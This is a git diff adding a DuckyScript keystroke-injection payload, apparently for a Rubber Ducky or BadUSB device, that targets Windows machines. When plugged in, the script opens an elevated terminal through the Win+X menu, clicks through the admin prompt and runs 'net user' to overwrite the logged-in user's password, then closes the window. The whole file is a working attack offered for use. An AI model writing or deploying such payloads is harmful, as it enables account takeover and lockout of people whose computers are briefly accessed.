diff --git a/windows/change_password.txt b/windows/change_password.txt new file mode 100644 index 0000000..5a46892 --- /dev/null +++ b/windows/change_password.txt @@ -0,0 +1,22 @@ +REM ================================ +REM payload made by bst04 +REM Windows Devices +REM change "password" with another +REM ================================ + +DELAY 1000 +GUI x +DELAY 500 +STRING a +DELAY 500 +LEFT_ARROW +DELAY 500 +ENTER + +DELAY 2000 +STRING net user $env:USERNAME +STRING "password" +ENTER +DELAY 1000 + +ALT F4